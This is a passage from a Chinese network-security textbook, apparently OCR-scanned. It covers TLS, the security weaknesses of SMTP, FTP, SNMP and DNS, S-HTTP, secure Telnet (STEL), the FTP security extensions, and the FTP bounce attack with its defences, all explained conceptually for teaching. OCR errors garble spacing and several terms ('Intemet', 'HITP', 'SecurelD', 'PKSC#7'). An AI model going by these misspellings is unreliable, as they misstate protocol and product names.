一 个 TLS 1.0 文档 。 这 个 文档 本 身 也 指出 ， 它 与 SSL 3.0 基本 相同 。 根 据 IETF 的 San Jose 
会 议 纪 要 ， 工 作 组 明显 倾向 于 要 让 草案 基于 SSL 3.0， 而 抛 开 SSL 2.0、PCT 1.0 和 
SSH 2.0。 草 案 对 SSL 3.0 的 改动 很 小 。 但 是 即使 这 样 ， 并 不 能 想当然 地 说 ， 它 和 SSL 3.0 
之 间 可 以 兼容 。 当 然 从 实现 上 来 讲 ， 这 两 个 协议 之 间 可 以 做 到 相互 兼容 。 

经 过 一 些 修改 ，TLS 1.0 已 经 于 1999 年 成 为 RFC 2246 文档 。 并 且 ， 在 应 用 TLS 时 ， 
原来 的 上 层 协议 ， 比 如 SMTP、IMAP， 也 进行 了 扩充 和 改进 。 

和 SSL 及 PCT 类 似 ，TLS 协议 本 身 是 一 个 分 层 的 协议 。 比 较 低 的 一 层 是 TLS 记录 协 
议 ， 它 得 到 要 传输 的 数据 之 后 ， 把 数据 分 片 并 进行 压缩 处 理 ， 增 加 MAC 再 进行 加 密 。 和 
这 些 步骤 相对 应 的 数据 块 分 别 被 称 为 TLS 明文 、TLS 压缩 和 TLS 密 文 ， 远 程 端 接收 到 
TLS 密 文 之 后 ， 反 过 来 ， 对 数据 包 进行 解密 、 验 证 、 解 压 和 重组 ， 然 后 ， 再 把 数据 交 给 上 
面 的 层 。 

在 上 面 一 层 是 TLS 握手 协议 ， 它 用 来 协商 会 话 状态 ， 包 括 会 话 标 识 、 对 等 认证 、 压 
缩 方 法 、 加 密 参数 、 主 密 钥 以 及 旧 会 话 和 新 会 话 的 标志 。 下 面 是 用 来 创建 TLS 记录 协议 
的 用 户 : 

TLS 改变 加 密 参数 协议 。 

e@ TLS 告警 协议 。 

@ TLS 握手 协议 。 

当 TLS 握手 协议 执行 完毕 之 后 ， 客 户 端 和 服务 器 端 就 可 以 交换 应 用 数据 消息 了 。 这 
些 消息 由 TLS 记录 协议 ， 它 会 进行 分 片 、 压 缩 、 验 证 和 机 密 处 理 。 这 些 消息 对 于 TLS 记 
录 协 议 是 透明 的 。 


2.2.4 ”应 用 层 及 网 络 应 用 安全 


应 用 层 的 安全 问题 可 以 分 解 成 网 络 层 、 操 作 系统 、 数 据 库 的 安全 问题 。 由 于 应 用 系统 
复杂 多 样 ， 不 可 能 只 用 一 种 安全 技术 就 解决 全 部 和 一 些 特殊 应 用 系统 的 安全 问题 。 但 是 ， 
对 一 些 通 用 的 应 用 程序 ， 如 Web Server 程序 、FTP 服务 程序 、E-mail 服务 程序 、 浏 览 
器 、 办 公 软 件 等 ， 可 以 通过 网 络 系统 扫描 的 方式 检查 应 用 程序 的 安全 漏洞 和 配置 不 当 的 漏 
洞 ， 以 最 大 限度 地 消除 安全 隐患 。 

应 用 层 约 有 几 十 万 个 应 用 程序 ， 利 用 TCP/IP 协议 运行 和 管理 。 需 要 重点 解决 的 特殊 
应 用 系统 的 安全 问题 包括 Telnet、FTP、SMTP、DNS、NFS( 主 机 间 文 件 系 统 的 共享 )、 
BOOTP( 用 于 无 盘 主机 的 启动 )、RPC( 实 现 远程 主机 的 程序 运行 )、SNMP( 简 单 网 络 管理 的 
协议 ) 等 。 
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1. 简单 邮件 传输 协议 (SMTP) 


攻击 者 可 以 通过 SMTP 协议 对 E-mail 服务 器 进行 干扰 和 破坏 ， 对 SMTP 服务 器 采用 
不 同方 式 的 攻击 。 例 如 ， 向 SMTP 服务 器 发 送 大 量 的 病毒 垃圾 邮件 和 集束 “数据 炸弹 ”， 
致使 服务 器 不 能 正常 处 理 合法 用 户 的 E-mail， 导 致 对 合法 用 户 的 拒绝 服务 。 因 此 ，SMTP 
服务 器 应 增加 过 滤 、 扫 描 及 设置 拒绝 特定 邮件 等 功能 。 


2. 文件 传输 协议 (FTP) 


FTP 用 于 建立 以 TCP/IP 连接 后 发 送 和 接收 文件 。FTP 由 服务 器 和 客户 端 组 成 ， 基 本 
每 个 TCP/IP 主机 都 有 内 置 的 FTP 客户 端 ， 并且 大 多 数 的 服务 器 都 有 FTP 服务 器 程序 ， 
FTP 用 两 个 端口 通信 。 利 用 TCP21 端口 控制 建立 连接 ， 使 连接 端口 在 整个 FTP 会 话 中 保 
持 开 放 ， 用 于 在 客户 端 和 服务 器 之 间 发 送 控制 信息 和 客户 端 命令 。 数 据 连接 建立 使 用 一 个 
短暂 的 临时 端口 。 在 客户 端 和 服务 器 之 间 传 输 一 个 文件 时 每 次 都 建立 一 个 数据 连接 。 

当 FTP 服务 器 需要 认证 时 ， 所 有 的 用 户 名 和 密码 都 以 明文 传输 。 寻 找 允 许 匿 名 连接 
并 且 有 写 权限 的 FTP 服务 器 是 黑客 攻击 的 方法 之 一 。 找 到 这 样 的 服务 器 之 后 上 传 大 量 杂 
乱 信息 塞 满 整个 存储 空间 ， 从 而 导致 操作 系统 难以 正常 运行 ， 致 使 日 志文 件 没 有 空间 再 记 
录 其 他 事件 ， 以 达到 黑客 进入 操作 系统 或 其 他 服务 的 日 志文 件 而 逃脱 检查 的 目的 。 


3. 超 文本 传输 协议 (HTTP) 


HTTP 是 互联 网 上 应 用 最 广泛 的 协议 。HTTP 使 用 80 端口 来 控制 连接 与 一 个 临时 端口 
传输 数据 、 客 户 端 浏览 应 用 程序 和 HTTP 服务 器 的 外 部 应 用 程序 ，HTTP 客户 端 使 用 浏览 
器 访问 和 接收 从 服务 器 端 返回 的 Web 网 页 。 


4. 简单 网 络 管理 协议 (SNMP) 


SNMP 允许 管理 员 检 查 网 络 运 行 的 状态 并 修改 SNMP 带 来 的 配置 、 收 集 任 何 由 
SNMP 代理 发 送 的 内 容 ， 并 直接 从 这 些 代理 得 到 查询 信息 。SNMP 可 以 通过 UDP 的 161 
和 162 端口 传递 所 有 信息 ， 但 容易 被 黑客 冒名 和 利用 。 

另外 ，SNMP 提供 的 有 效 认证 是 团体 名 ， 若 管理 者 和 代理 有 相同 的 团体 名 并 处 于 权限 
允许 的 IP 地 段 内 ， 将 允许 所 有 SNMP 查询 。 黑 客 如 果 得 到 了 团体 名 ， 便 可 以 查询 和 修改 
网 络 上 所 有 使 用 SNMP 的 节点 ， 并 可 利用 SNMP 管理 器 连接 到 网 络 的 任何 位 置 ， 进 而 得 
到 这 些 明文 信息 。 


5. 域名 系统 (DNS) 


计算 机 网 络 通过 DNS 在 解析 域名 请 求 时 使 用 DNS 的 53 端口 ， 而 在 进行 区 域 传输 时 
使 用 TCP 的 53 端口 。 其 中 区 域 传输 有 以 下 两 种 情况 : 

@ ”客户 端 利用 nslookup 命令 向 DNS 服务 器 请 求 进行 区 域 传输 。 

e@ ”从 属 域名 服务 器 向 主 服务 器 请 求 得 到 一 个 区 域 文件 。 

黑客 攻击 一 个 DNS 服务 器 就 能 得 到 一 个 区 域 文件 ， 从 中 可 掌握 这 个 区 域 中 所 有 系统 
的 卫 地 址 和 计算 机 名 。 

Internet 的 迅速 成 长 和 受到 广泛 欢迎 的 主要 原因 是 World Wide Web(WWW) 和 超 文本 
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传输 协议 (HTTP) 的 便利 性 。 与 Intemet 上 的 其 他 服务 一 样 ，WWW 服务 能 得 到 广泛 使 用 也 
得 益 于 它 的 开放 性 ， 而 不 是 它 的 安全 性 。 以 前 人 们 认为 ，HTTP 服务 器 提供 的 所 有 信息 都 
是 可 以 公开 的 ， 不 需要 什么 形式 的 用 户 验 证 和 授权 。 但 是 ， 现 在 这 种 情况 已 经 有 了 很 大 的 
改变 。 今 天 ， 我 们 经 常 有 必要 限制 一 些 用 户 对 特定 信息 页 的 访问 ， 或 者 保护 在 HTTP 客户 
端 和 服务 器 端 之 间 传递 信息 的 保密 性 和 完整 性 。 甚 至 还 有 更 高 的 要 求 ， 比 如 ， 提 供 WWW 
事务 的 某 种 抗 抵赖 性 服务 。 


6. 安全 HTTP 协议 


WWW 应 用 和 事务 方面 的 一 些 安全 要 求 ， 在 以 前 也 有 一 定 程 度 的 实现 。 例 如 ， 大 多 数 
的 HTTP 服务 器 ， 都 能 提供 基于 地 址 的 认证 和 基于 口令 的 认证 ， 其 中 包括 最 常 使 用 的 IS 
服务 器 和 Apache 服务 器 。 但 是 ， 这 些 机 制 中 最 明显 的 问题 有 两 个 : 一 个 是 IP 地 址 很 容易 
被 伪造 ， 另 一 个 是 口令 以 明文 的 形式 传输 ， 有 可 能 被 窍 听 。 从 这 个 角度 来 看 ， 安 全 的 
HTTP 和 其 他 使 用 TCP/IP 的 应 用 协议 之 间 在 安全 要 求 方面 没有 什么 不 同 。 如 果 想 做 得 更 
安全 ， 就 得 使 用 加 密 技术 (本 书 第 3 章 详细 介绍 )。 例 如 ， 有 人 建议 用 摘要 认证 来 代替 基本 
的 基于 口令 的 认证 。 简 单 来 讲 ， 摘 要 认证 方式 和 通过 串 行 通信 (例如 拨号 网 络 ) 访 问 Internet 
时 所 使 用 的 质询 /握手 协议 (Challenge Handshake Authentication Protocol，CHAP) 有 很 多 相 
似 之 处 。 这 两 种 方式 中 ， 验 证 方 都 会 用 一 个 随机 数 质 询 被 验证 方 ， 而 被 质询 方 必须 根据 适 
当 的 哈 希 值 和 其 他 信息 进行 回答 。 摘 要 认证 是 其 中 一 个 解决 方案 ， 当 然 还 有 很 多 的 WWW 
应 用 和 事务 安全 方案 。 

安全 的 超 文 本 传输 协议 (Secure Hypertext Transfer Protocol，S-HTTP) 最 初 由 企业 集成 
技术 公司 (Enterprise Integration Technologies Corporation，EIT) 的 Eric Rescorta 和 Allan 
Schiffman 两 位 专家 ， 以 商业 网 络 协会 (Commerce Net Consortium) 代 表 的 名 义 提出 。S- 
HTTP 通过 把 加 密 增强 功能 集成 到 HTTP 通信 流 中 ， 在 应 用 层 实 现 了 对 WWW 事务 安全 的 
支持 。S-HTTP 1.0 由 商业 网 络 协会 于 1994 年 6 月 发 表 。 自 从 1995 年 以 后 ，S-HTTP 规范 
在 IETF WTS 工作 组 的 支持 和 发 展 下 ， 进 一 步 得 到 了 发 展 。1997 年 3 月 ，S-HITP 规范 升 
级 为 1.3 版 本 。1999 年 8 月 ， 升 级 为 1.4 版 本 ， 并 形成 了 RFC2660。 

S-HTTP 定义 对 HITP 进行 了 扩展 ， 可 以 给 WWW 事务 提供 端 到 端的 安全 服务 。 这 个 
协议 很 重视 协商 和 选择 密 钥 管理 机 制 、 安 全 策略 和 加 密 算法 这 几 个 方面 的 灵活 性 。 当 然 这 
里 指 的 协商 是 支持 S-HTTP 协议 的 服务 器 和 支持 S-HTTP 协议 的 客户 端 之 间 的 协商 。 例 
如 ，S-HTTP 不 要 求 使 用 客户 端 证 书 ， 如 果 客 户 端 有 证 书 ， 那 也 可 以 用 来 验证 。 如 果 客 户 
端 没有 证 书 ， 则 可 以 使 用 其 他 安全 技术 。 这 一 点 很 重要 ， 这 样 即使 双方 没有 公开 密 钥 证 
书 ， 事 务 还 可 以 继续 进行 。S-HITP 既 可 以 支持 PKI， 也 可 以 不 支持 PKI。S-HTTP 还 提供 
灵活 的 加 密 算法 模式 和 参数 选择 。 我 们 把 S-HTTP 规范 建议 支持 的 加 密 技术 和 算法 总 结 在 
表 2-10 中 。 加 密 算法 将 在 本 书 的 后 续 章 节 中 做 详细 介绍 。 


表 2-10 S-HTTP 支持 的 加 密 技术 和 算法 


加 密 技术 


单 向 哈 希 函数 
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续 表 
加 密 技术 


DES-CBC 
3DES-CBC 
DESX-CBC 
IDEA-CFB 
RC2-CBC 
RC4 
CDMF-CBC 
RSA 

DSS 


加 密 算法 


数字 签名 算法 


S-HTTP 支持 不 同 软件 实现 之 间 的 互 操 作 ， 并 且 能 兼容 原来 的 HITP。 也 就 是 说 ， 支 
持 S-HTTP 的 客户 端 可 以 和 不 支持 S-HTTP 的 服务 器 进行 通信 ;， 反之， 也 成 立 。 当 然 ， 在 
这 种 情况 下 ， 就 无 法 利用 S-HTTP 的 安全 特性 了 。 

从 语法 上 讲 ，S-HTTP 消息 和 HTTP 消息 很 相似 。 前 面 有 请 求 和 状态 行 ， 后 面 跟着 头 
部 和 包含 着 页 面 内 容 的 主体 部 分 。 

S-HTTP 的 请 求 以 及 状态 行 HTTP 的 相应 部 分 很 相似 。 为 了 把 S-HTTP 消息 和 HTTP 
消息 区 分 开 来 ， 便 于 进一步 进行 特殊 的 处 理 ，S-HTTP 的 请 求 和 状态 行 得 用 一 个 特定 的 协 
议 标 识 符 Secure-HTTP/1.x 来 区 分 。 这 里 的 x 代表 的 是 S-HTTP 版 本 。 这 样 对 S-HTTP 和 
HTTP 请 求 的 处 理 可 以 在 一 个 TCP/IP 端口 上 进行 (例如 ，80 端口 )。 如 果 将 来 有 新 版 本 的 
HTTP 能 包容 $-HTTP， 也 可 以 去 掉 这 种 区 分 标志 。 

S-HTTP 规范 定义 了 一 套 新 的 RFC822 风格 的 头 部 行 ， 这 些 头 部 行 可 以 加 到 S-HTTP 
消息 的 头 部 中 ，S-HTTP 头 部 中 可 能 包含 的 信息 列 在 表 2-11 中 。 大 多 数 的 S-HTTP 都 是 可 
选 的 。 但 是 ， 其 中 有 两 个 是 必 选 的 : Content-Privacy-Domain 和 Content-type。 Content- 
Privacy-Domain 定义 加 密 消息 的 格式 ， 例 如 ， 是 PKSC#7， 还 是 MSS。Content-type 定义 
被 封装 的 数据 类 型 ， 例 如 ， 如 果 是 HITP 的 话 ， 就 是 application/http。S-HTTP 消息 中 封 
装 的 内 容 ， 很 大 程度 上 和 Content-Pricacy-Domain 以 及 最 后 Content-Transfer-Encoding 域 的 
值 有 关 。 请 参考 相应 的 RFC 文档 ， 看 看 可 以 有 哪些 组 合 。 

表 2-11 S-HTTP 头 和 它 封 装 的 HTTP 头 

头 类 型 
Content-Pricacy-Domain 
Content-Transfer-Encoding 
Content-type 
Prearranged-Key-Info 
MAC-Info 
Key-Assign 
Encryption-Identity 


Certificate-Info 
Nonce 


S-HTTP 头 


HITP 非 协商 头 


Nonce-Echo 
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续 表 
头 类 型 类 
SHTTP- Pricacy-Domains 
SHTTP- Certificate-Types 
SHTTP-Key Exchange-Algorithms 
SHTTP-Signature-Algorithms 
SHTTP-Message-Digest-Algorithms 
SHTTP-Symmetric-Content-Algorithms 
SHTTP-Symmetric-Header-Algorithms 
SHTTP-Privacy-Enhancements 
Your-Key-Patterm 


封装 好 了 的 消息 中 的 内 容 主要 是 S-HTTP 消息 、HTTP 消息 或 简单 的 数据 。 

S-HTTP 从 三 个 维度 对 消息 内 容 进行 保护 : 数字 签名 、 验 证 和 加 密 。 任 何 消 息 都 可 以 
加 签名 、 验 证 或 加 密 ， 或 者 把 这 三 个 方式 组 合 起 来 提供 保护 。 

如 果 使 用 数字 签名 ， 则 消息 后 面 要 附加 适当 的 证 书 ， 或 者 接收 方 自己 要 能 通过 其 他 渠 
道 获取 证 书 。 

如 果 使 用 了 消息 验证 ， 那 么 ,会 用 一 个 共享 密 钥 通过 单 向 哈 希 函数 对 整个 文档 计算 
MAC 值 。 当 然 ， 这 个 共享 密 钥 也 可 以 通过 多 种 方法 获得 ， 包 括 通过 人 工 传送 和 人 工 配 
置 ， 或 者 是 用 Kerberos 的 票据 。 

为 了 支持 数据 加 密 ，S-HTTP 定义 了 两 个 密 钥 分 发 机 制 : 第 一 个 机 制 需要 使 用 公开 密 
钥 证 书 进行 带 密 钥 交换 ， 在 任何 情况 下 ， 发 送 方 都 用 接收 方 的 公开 密 钥 把 事务 密 钥 加 密 ; 
第 二 种 机 制 不 需要 公开 密 钥 证 书 ， 事 务 密 钥 用 另外 准备 好 的 密 钥 加 密 ， 相 应 的 密 钥 信息 在 
S-HTTP 的 头 部 信息 中 表明 。 或 者 事务 密 钥 也 可 以 从 Kerberos 证 书 中 提取 。 

为 了 区 分 使 用 S-HTTP， 协 议定 义 了 一 个 新 的 URL 协议 标识 符 shttp 。 如 果 把 这 个 
URL 标识 符 作为 anchor 的 一 部 分 ， 表 明 目 标 服务 器 是 支持 S-HTTP 的 ， 并 且 离 开 这 个 标 
志 的 时 候 ， 也 应 该 明确 地 标 出 来 。 目 前 ， 协 议 给 S-HTTP 定义 了 三 个 anchor 属性 ， 如 
表 2-12 所 示 。 关 于 anchor 对 HTTP 的 扩展 ， 这 里 不 再 进一步 讨论 ，Intemet 有 相关 的 草案 
文档 规定 。 


HTTP 协商 头 


表 2-12 S-HTTP 的 anchor 属性 


Anchor 属性 描 _ 述 
DN 包含 主体 的 重要 名 字 (Distinguished Name，DN)， 应 该 加 密 
NONCE 包含 时 间 信息 ， 必 须 以 独立 的 头 返回 
CRYPTOPTS 包含 加 密 选 项 信息 


总 的 来 说 ，S-HTTP 所 支持 的 安全 机 制 和 加 密 算 法 非常 灵活 。 但 是 ， 也 正 是 因为 它 的 
灵活 性 ， 很 多 人 认为 对 它 进行 实现 实在 是 太 困难 了 。 困 难 的 原因 : 一 方面 是 由 于 目前 可 以 
参考 的 S-HTTP 实现 太 少 ， 难 以 进一步 开发 ， 另外 ，S-HTTP 和 SSL 之 间 也 容易 搞 混 。 当 
然 ， 可 以 让 SSL 是 传输 层 的 安全 协议 ， 而 S-HTTP 是 应 用 层 的 安全 协议 。 更 准确 地 讲 ， 
SSL 在 客户 端 和 服务 器 端 之 间 建 立 一 个 安全 的 TCP/IP 连接 ， 而 这 个 安全 的 连接 可 以 用 于 
HTTP 的 通信 ;相反 ，S-HTTP 则 用 正常 的 TCP/IP 连接 来 传输 。 安 全 服务 的 协商 通过 给 特 
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定 的 文档 增加 附加 头 域 和 属性 来 实现 。 如 果 考 虑 到 S-HTTP 工作 在 应 用 层 ， 而 SSL 工作 在 
传输 层 ， 我 们 可 以 设想 ， 可 以 把 S-HTTP 架设 在 SSL 之 上 来 实现 某 种 安全 组 合 ， 提 高 安 
全 性 。 

以 前 ， 在 选择 是 使 用 S-HTTP 还 是 使 用 SSL 方面 ， 存 在 一 些 分 歧 。 有 些 厂商 倾向 于 使 
用 S-HTTP， 而 另外 一 些 厂商 则 倾向 于 使 用 SSL。 后 来 ， 厂 商 们 开始 同时 支持 S-HTTP 和 
SSL。 就 目前 来 讲 ，SSL 的 应 用 还 是 相对 广泛 一 些 。 


7. 安全 Telnet 协 议 


安全 Telnet(Secure Telnet，STEL)， 是 给 UNIX 系统 开发 的 另外 一 个 安全 的 Telnet 软 
件 包 ， 它 由 米兰 大 学 和 意大利 计算 机 紧急 反应 小 组 (Computer Emergency Response Team， 
CERT) 合 作 开发 。 开 发 STEL 的 目的 ， 是 给 用 户 提供 类 似 于 Rlogin 及 Telnet 的 远程 终端 访 
问 能 力 。 不 过 ，STEL 提供 的 认证 机 制 比 Telnet 和 Rlogin 要 强 得 多 ， 并 且 在 这 个 软件 中 ， 
客户 端 和 服务 器 端 之 间 传 输 数据 的 流量 被 透明 加 密 。 客 户 端的 软件 STEL 直接 由 用 户 运 
行 ， 而 服务 器 的 软件 steld， 可 以 由 超级 用 户 以 守护 进程 的 方式 独立 运行 ， 或 者 也 可 以 由 
inetd 自动 启动 。 

和 SRA、NATAS 相似 ，STEL 用 共享 数 p(512 位 或 者 是 1024 位 ) 和 共享 产生 器 (g-3) 的 
方式 进行 Diffie-Hellman 密 钥 交换 ， 由 客户 端 和 服务 器 共同 协商 会 话 密 钥 。 真 正 的 会 话 密 
钥 是 通过 MD5 来 哈 希 Diffie-Hellman 密 钥 交换 产生 的 。 为 了 防止 中 间 人 攻击 ，STEL 也 
实现 了 前 面 讲 的 互 锁 协议 ， 从 这 一 点 上 讲 ，STEL 和 NATAS 的 设计 有 所 不 同 。 另 外 ， 
STEL 支持 三 种 不 同 的 认证 方法 对 用 户 进行 验证 。 按 照 安全 性 从 高 到 低 ， 这 些 方法 依 
次 为 : 

@ SecurelD; 

@ SIKey; 

e@ 标准 的 UNIX 口令 。 

第 一 种 认证 方式 虽然 很 安全 ， 但 是 ，SecureID 令 牌 在 Intemet 上 的 应 用 还 不 太 广 泛 。 
后 面 两 种 认证 方式 ， 即 SKey 和 标准 的 UNIX 口令 ， 更 加 常见 。STEL 用 修正 的 SKey 来 
防止 字典 攻击 。 要 注意 一 点 ， 这 里 所 讲 的 标准 的 UNIX 口令 认证 和 原来 的 UNIX 口令 有 区 
别 。 因 为 这 时 客户 端 和 服务 器 之 间 的 通信 通道 是 透明 加 密 的， 这 种 加 密 能 保证 口令 传输 的 
安全 。 使 用 这 种 方式 时 ， 安 全 水 平和 SSL 相似 。 如 果 读 者 读 过 前 面 一 章 就 会 了 解 到 ， 利 
用 SSL 可 以 在 客户 端 和 服务 器 之 间 建 立 安全 的 数据 通道 ， 这 个 数据 通道 可 以 用 来 传输 敏 
感 数据 ， 包 括 信 用 卡 信息 、 用 户 名 和 口令 。 

在 Diffie-Hellman 密 钥 交换 和 客户 端 验 证 之 后 ， 所 有 的 数据 流 都 用 某 种 加 密 算法 ， 并 
用 会 话 密 钥 透明 地 加 密 。 默 认 情 况 下 ， 加 密 算法 是 DES， 这 种 算法 速度 比较 快 。 同 时 ， 这 
个 软件 也 提供 了 对 3-DES 和 IDEA 的 支持 。 由 于 STEL 软件 是 在 美国 之 外 开发 的 ， 所 以 ， 
它 可 以 在 全 世界 发 布 ， 不 会 有 什么 法 律 问题 。STEL 在 Internet 上 有 源 代码 。 

总 之 ， 在 公司 内 部 网 中 ， 用 安全 的 Telnet 来 代替 原来 的 Rlogin 和 Telnet 是 很 重要 
的 。 如 果 公 司 的 员工 经 常 要 从 外 部 网 络 登录 公司 的 内 部 网 络 ， 例 如 ， 出 差 的 员工 从 很 远 的 
地 方 用 Intemet 连接 到 公司 内 部 网 ， 用 安全 Telnet 来 代替 原来 的 Telnet 特别 重要 。Rlogin 
使 用 基于 地 址 的 认证 方式 ， 很 容易 遭 到 IP 地 址 欺骗 的 攻击 。 而 在 原来 的 Telnet 中 ， 口 令 
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是 以 明文 的 方式 进行 传输 的 ， 很 容易 遭 到 窃听 和 重 放 攻 击 。 

至 于 使 用 哪 种 软件 好 ， 哪 些 软 件 更 安全 ， 反 而 不 是 特别 重要 了 。 只 要 自己 内 部 协商 
好 ， 使 用 兼容 的 软件 就 可 以 。 前 面 提 到 的 所 有 安全 增强 Telnet 软件 包 ， 并 没有 很 大 的 区 
别 。 我 们 也 看 到 它们 都 是 用 Diffie-Hellman 密 钥 交 换 来 协商 会 话 密 钥 的 ， 会 话 密 钥 既 可 以 
用 来 加 密 认证 信息 ， 也 可 以 用 来 加 密 后 来 传输 的 数据 。 考 虑 到 使 用 远程 终端 访问 时 ， 会 出 
现 一 次 传输 一 个 字符 的 交互 现象 ， 所 以 ， 经 常会 使 用 CFB 和 OCB 操作 模式 。 这 样 ， 错 误 
扩散 的 问题 不 大 ， 因 为 即使 中 间 出 现 交 互 混乱 ， 也 能 够 很 快 就 重新 恢复 会 话 。 无 论 是 使 用 
哪 种 模式 。 前 面 提 到 的 软件 包 都 能 很 好 地 安全 通信 ， 就 算是 只 使 用 基于 口令 的 认证 ， 一 般 
也 没有 问题 。 因 为 在 这 种 情况 下 ， 口 令 是 在 安全 的 通道 中 透明 传输 的 。 因 此 ， 即 使 有 人 在 
中 间 窃 听 ， 也 没有 办 法 得 到 明文 口令 ， 当 然 SRA 已 经 被 证 明 可 能 遭 到 密码 分 析 和 中 间 人 
攻击 。 如 果 可 能 的 话 ， 最 好 使 用 最 新 的 软件 。 

8. 安全 文件 传输 协议 

文件 传输 协议 (FTP) 是 为 进行 文件 共享 而 设计 的 因特网 标准 协议 。FTP 主要 采用 传输 
控制 协议 (Transmission Control Protocol，TCP) 和 Telnet 协议 。 

1) ”FTP 模型 

就 模型 而 言 ， 从 1973 年 以 来 基本 没有 什么 变化 ， 图 2-7 所 示 为 FTP 的 使 用 模型 。 


Control Connection 


FTP Commands 
em 0 医 国 
User DTP 


Data Connection 
Server DTP 


注 : 数据 连接 可 以 双向 使 用 ( 双 工 )。 
数据 连接 不 需要 一 直 存 在 。 


图 2-7 FTP 的 使 用 模型 
术语 解释 如 下 。 
@ User PI(User-Protocol Interpreter): 用 户 协 议 解释 器 。 
@ Server PI (Server-Protocol Interpreter): 服务 器 协议 解释 器 。 在 端口 上 侦 听 来 自 
User PI 的 连接 ， 并 建立 通信 控制 连接 。 它 接收 来 自 User PI 的 标准 FTP 命令 、 发 
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送 应 答 、 管 理 Server DTP。 

Control Connection: 控制 连接 。User PI 和 Server PI 交换 命令 和 应 答 的 通信 路 
径 ， 遵 循 Telnet 协议 。 

Data Connection: 数据 连接 。 

User DTP(User Data Transfer Process): 数据 传输 进程 和 数据 端口 侦 听 来 自 服务 器 
FTP 进程 的 连接 。 如 果 两 个 服务 器 之 间 正 在 传输 数据 ， 那 么 User DTP 无 效 。 
Server DTP(Server Data Transfer Process): 在 正常 的 主动 (Active) 状 态 下 ， 数 据 传 
输 进程 同 正在 侦 听 的 数据 端口 建立 连接 。 它 用 于 设置 传输 和 存储 参数 ， 并 在 PI 
的 命令 下 传输 数据 。DTP 也 可 以 处 于 被 动 (Passive) 状 态 。 

FTP Commands: FTP 命令 。 描 述 Data Connection 的 参数 以 及 文件 操作 类 型 。 
FTP Replies: FTP 应 答 。 


在 图 2-7 描述 的 模型 中 ，User PI 发 起 控制 连接 ， 控 制 连接 遵从 Telnet 协议 。 在 用 户 
初始 化 阶段 ， 标 准 FTP 命令 由 User PI 产生 并 通过 控制 连接 传 到 服务 器 进行 处 理 。Server 
PI 将 相应 的 标准 FTP 应 答 通 过 控制 连接 回 传 给 User PI。FTP 命令 规定 了 数据 连接 的 参数 
(数据 端口 、 传 输 模式 、 表 示 形 式 和 结构 ) 和 文件 系统 的 操作 (存储 、 获 取 、 插 入 、 删 除 
等 )。 数 据 传输 由 数据 连接 完成 。 数 据 连接 可 以 同时 用 于 发 送 和 接收 。 

User DTP 进程 必须 保证 在 特定 数据 端口 监听 ， 由 Server DTP 用 户 指 定 参数 初始 化 数 


据 连接 。 


另 一 种 情形 是 用 户 希 望 在 两 台 非 本 地 的 FTP 主机 之 间 传 递 文件 。 用 户 与 两 个 服务 器 
分 别 建立 连接 ， 安 排 两 个 服务 器 间 的 数据 连接 。 在 这 种 情况 下 ， 控 制 信息 传递 给 User 
PI， 但 是 数据 是 在 服务 器 的 数据 传输 进程 之 间 传输 的 ， 图 2-8 描述 了 这 样 的 服务 器 间 交 互 


模型 。 


User FTP 
User PI 


“Cn 


Server FTP 数据 连接 
人 端口 A) 


Server FTP 
“B" 


端口 B) 


图 2-8 服务 器 间 交 互 模型 


此 协议 要 求 数据 传输 进行 的 同时 保持 控制 连接 的 打开 。 使 用 完 FTP 服务 后 ， 用 户 负 
责 关 闭 控制 连接 ， 虽 然 实际 上 是 由 服务 器 实施 具体 的 关闭 行为 的 。 

2) FTP 协议 的 安全 扩展 

当前 实现 文件 安全 传输 的 方法 有 : 


通过 FTP 传输 预先 被 加 密 的 文件 ; 
通过 E-mail 传输 预先 被 加 密 的 文件 ; 
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@ 通过 PEM(Pricacy Enhanced Mail) 消 息 传输 文件 ; 

@ ”通过 使 用 Kerberos 增强 rep 命令 传输 文件 。 

在 RFC2228 之 前 的 FTP 并 不 安全 。 虽 然 FTP 采用 Telnet 协议 执行 控制 连接 操作 ， 而 
且 Telnet 协议 后 来 又 增补 了 认证 和 加 密 选 项 。 但 在 RFC1123 中 明确 禁止 了 在 控制 连接 中 
进行 Telnet 选项 协商 。 另 外 Telnet 认证 和 加 密 选 项 没有 提供 完整 性 保护 ， 而 且 也 没有 对 数 
据 通 道 进行 保护 。 

RFC2228 的 扩展 命令 如 下 : 
AUTH(Authentication/Security Mechanism)， 认 证 与 安全 机 制 。 
ADAT(Authentication/Security Data)， 认 证 与 安全 数据 。 
PROT(Data Channel Protection Level)， 数 据 保护 等 级 。 
PBSZ(Protection Buffer Size)， 保 护 缓冲 大 小 。 
CCC(Clear Command Channel)， 清 空 命令 通道 。 
MIC(Integrity Protected Command)， 完 整 性 保护 命令 。 
CONF(Confidentiality Protected Command)， 保 密 性 保护 命令 。 
ENC(Privacy Protected Command)， 私 有 性 保护 命令 。 

3) 协议 的 安全 问题 及 防范 措施 

(1) 漏洞 。FTP 规范 定义 了 “代理 FTP” 机 制 ， 即 允许 客户 端 要 求 服务 器 向 第 三 方 机 
器 传输 文件 ， 这 个 第 三 方 机 器 就 是 代理 FTP。 同 时 ，FTP 规范 中 对 使 用 的 TCP 端口 号 没 
有 任何 限制 ， 但 通常 0~1023 之 间 的 TCP 端口 号 保留 ， 用 于 著名 的 网 络 服务 。 所 以 ， 通 
过 “代理 FTP”， 客 户 可 以 命令 FTP 服务 器 攻击 任何 一 台 机 器 上 众所周知 的 服务 。 

(2) 反弹 攻击 。 客 户 发 送 一 个 包含 被 攻击 的 机 器 与 服务 器 的 网 络 地 址 和 端口 号 的 FTP 

“PORT” 命 令 。 这 时 客户 要 求 FTP 服务 器 向 被 攻击 的 服务 发 送 一 个 文件 ， 这 个 文件 中 应 

包含 与 被 攻击 的 服务 相关 的 命令 (例如 : SMTP、NNTP)。 由 于 是 命令 第 三 方 去 连接 服务 ， 
而 不 是 直接 连接 ， 这 样 不 仅 使 追踪 入 侵 者 变 得 更 加 困难 ， 还 能 避 开 基于 网 络 地 址 的 访问 
限制 。 

最 简单 的 防范 措施 就 是 封锁 漏洞 。 首 先 ， 服 务 器 最 好 不 要 建立 TCP 端口 号 在 1024 以 
下 的 连接 。 如 果 服 务 器 收 到 一 个 包含 TCP 端口 号 在 1024 以 下 的 PORT 命令 ， 服 务 器 可 以 
返回 消息 504( 表 示 “ 对 这 种 命令 参数 没有 实现 ”)。 

其 次 ， 禁 止 使 用 PORT 命令 也 是 可 选 的 防范 反弹 攻击 的 方案 。 大 多 数 的 文件 传输 只 需 
